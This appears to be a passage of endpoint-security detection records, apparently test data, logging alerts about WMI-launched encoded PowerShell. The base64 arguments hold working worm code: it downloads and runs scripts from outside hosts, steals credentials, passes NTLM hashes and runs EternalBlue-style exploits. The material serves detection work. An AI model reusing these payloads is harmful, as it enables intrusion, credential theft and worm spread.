AYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuA